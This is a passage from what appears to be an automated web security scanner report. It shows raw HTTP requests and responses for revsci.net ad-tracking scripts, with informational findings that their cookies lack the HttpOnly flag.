TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_96sc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_H9PS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ouyE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TPFo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JoIq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_V3Sj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Al2u=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KlBy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WxDm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8lxm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0xhU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_B35h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_b9v7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Dl2X=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NNGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_T7TS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e1UB=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hoxY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CSVk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_c-yi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_P-Tx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YMHi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YauM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_n6Bj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_10Pc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i0t6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0HN7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OOxT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CYvE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_P_wA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fqlT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a-bS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gU3y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_0M60=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4XRF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mKsM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D7_n=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xK1r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wv7Y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aMQ6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hCqO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_u2bt=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cDdJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_F9rS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cy72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tqOJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vkQg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dPEl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lQ5E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HP5F=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_afGD=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_99wg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Otdj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PS9L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_z5uu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LYEa=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_g7em=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bnh8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_j85P=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pGwN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zwtV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_11QG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lRqF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KNEl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yjL1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-YQM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IcRj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Ca17=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i8cQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I6ZG=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spY_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OMEF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JxrH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wxnV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DeFS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DPB9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Eqv9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lnFX=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sT2D=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_miei=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hsco=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Cr86=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_D9Sw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WIU4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qxGy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3y2w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4xbP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_G1y2=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hwHO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_x2n2=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_-Lvu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_llAU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_w7zu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LT7M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8ET4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ibmm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wTpK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p7-C=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_C_Ht=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YXIT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_V6xo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_E5ov=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VVpm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2kNV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yUWw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qGWu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_91iO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_OY3S=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6xX8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jwkV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bVdm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_JM_g=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_eLi0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mLYy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I6o-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KF7h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ozkm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yR00=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gaZK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4z_T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wwcK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hwZ0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cwsu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_FecB=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Jmpz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_26-Y=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_3ECb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_oSxg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jKkg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QkL_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_dzBy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fezZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QgWY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WTAw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Fw9h=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xmbE=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XGlz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a4UZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wbIY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RkPu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRdM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_40lM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_J6oy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uDVI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_anmi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6icd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_coNK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_t_8-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOE/F7gMQlrWdY9siSkqZE680dIsPyzLv7mCqBpJakqVFftDs8Pd8XH9p7LJOwoH+goYpPfri7ZTBvzBVf7SOFPaRj1HOKpjRvpAKtGje2Y3H4h//EkEw6Msyj40HEwS7e/06Sy9s4k8kNE/WoHW1C3nb6NhUPrzhVTUm0po5pvG/x2yipyOcnl8CyX8Ph5nifpkExZWQ1HO8VTJph99aLekgIJGcAHFOegq+bzrVdQKxKeDFmBZN; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
Set-Cookie: rtc_UUza=MLs38KNKcS5r5tIYsrgdBK11VmsPcJHEjh8FB4XxHMaJAW/yCsbueTOkM2I7/XCjGGDtu+H38Zi6DHtu6Jz2s/guplcWn9G+mKtXFNPD/GT0al2wX2OBBe5NhmRfx9Rtvi6+OYVG6B1HLTS/fubkWk/2Wr78IBEZfcQxbxZvLdlubczCSL5h9Xp2CZ5Ijou+QGBVYRzisz4PopFv7MEjzqqaMCMg8LhoUIRHIs+zFGlNMSXDVqlePNr2XGUHXlldp1DKQuzQ5FdkU0lSEeGT/NPMnqL/Dbs5RFmVr7vZtTHuI+MRsgjd+zdbPV0cdxij9ktIroXW6Um2lEkmDOqyF3jm+2i0BB6G3+YQcPhnogcX7yYHIAvY5J9uDXxtglmIJZmS+ZIPR8fGb8dBgNdnl1XQT5gJYx8ZGap1GsVz5R14Aosznra92XixAfy5jHEePiNeZRRs1lXlJ4UtJPzvobtA/LLyl1ewk7GYvp999XJW; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:54:35 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:54:35 GMT
Content-Length: 760

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273','I07714_10456'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rs
...[SNIP]...

14.71. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=MLvv8FEJoS9npx4Ednq9YMBs9UFoa0U2h9b6OXFScmalI3t4IfxJSN67yaGjig+eWmkqtj8SzXF4+FJSFwnD3jITRGB3M0Yx9P0nIeSjmJWTu+2Ant8jI058EvH0wiyEJabVhVaTXVQSXwV7CHWoAqOobVyK81IZLoWuX5iT7y3M8ScOMJrBsHg8KYeni5z/E6hkDffwQLF8iPG05ZYtUA0alpaWPIsfSZP09AwQLM4/SgJ1qogzpZ0jrN1odBAf2GHOabJZ2/4wM0E9KajR5b9r7hs8/D8TnAx33g4xWC9OBwrBjlk/nj/WE9jC9AL72Q1kBbW0aVwbUxDtsLsy72TezNYbA9wMR2b4t22vECwG52fwQCCp7YspVUnDU7ZUV1l52zdrMb4YjTBOPHikYQIi6KiPQYghVDCclLvvsPXKTwn7ANcw4uw1QyIILtMe8Q/lzIaPJ05O3JfbFWzgRbe0YqmmAFOP4r8JBDXmcRXJm9lth61wKthFl0nuld0zu0mX5KsXzUQHvihVAnP3goULD8pxYQk0WTzgXLF0RvPvH9Tw2lObtmDphrk7b9pbmIm86p9+zbQ+4UQg+3N4Z/k2caDp4CkFmcHwEglLKqKmuOJUrD9WrWEf

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3VhNtHAzsU1dB6gb/nWtD4g==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 672

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=[];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z]{
...[SNIP]...

14.72. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1008211/846374105.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /J06575/b3/0/3/1008211/846374105.js?D=DM_LOC%3Dhttp%253A%252F%252Fcontent.usatoday.com%252Fcommunities%252Fcampusrivalry%252Fpost%252F2011%252F09%252Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%252F1%253Fzipcode%253Dundefined%2526age%253Dundefined%2526gender%253Dundefined%2526country%253Dundefined%2526job%253Dundefined%2526industry%253Dundefined%2526company%2520size%253Dundefined%2526csp%2520code%253D%2526_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.google.com%252Ftrends%252Fhottrends%253Fq%253Dnotre%252Bdame%252Bfootball%2526date%253D2011-9-3%2526sa%253DX%26DM_EOM%3D1&C=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lFtlR8qmZ5EYm2QQMyGpObby6k3FFNuXo3vkdcB6Qb/nUpD6A==; NETID01=c84fd631153807952fe54cd0e5ae7570; rtc_H9PS=MLuBc48HgVlDFVRDdcKRF0hEtq+QxWzJMWpcEHBw; rsiPus_-Jfi="MLs3rM9rsF9jIDGyCCr682K4CNg8X7Y5TcUKMiQFekBN/mLe5nqMalU+Gy7oNgbZiUlKeqNvah6Lt6J7LWR+El708xKeHRN+oI/OdQ15h+vMTW6JE0MEL7RHL9MaSpr1EQ5M4r4OllpRkRseMAEP4XpmNxvt4zBx4/LsxjIzx0J+4PMlNVWbY30OlroflhaTjXYvF17b"; rsi_us_1000000="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"; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_H9PS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_96sc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJZLPlvN//lxCH/uYAwhrfLSEX/SETDPrLJfdcbwXj53YnjCTmjiXQQq1X7wFKW9k6/hM5xcabUnvVsTMBn+JFsrOOXsOsyVZ24LbrPbU7Qy1eQ==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
Set-Cookie: rtc_ouyE=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIPllZLMTR5d1cXDb2nHulG0vOSeoml1m03ilSbH+UDzM8ahhkyEaJIjsQemYPTPhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRdff7eSUvvXICfDWxc4bNSGk1cDx7BeF4VVH4blUATRCMCwARw0RFX3+FxhEN+3PO9ruFkmpBvIfPIfFcuxKb+JB8G9m7Y45Nn9cxH24FRAL/5a0q4smMaLz5gxlgZJ0DWNQ=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:42:17 GMT; Path=/
X-Proc-ms: 1
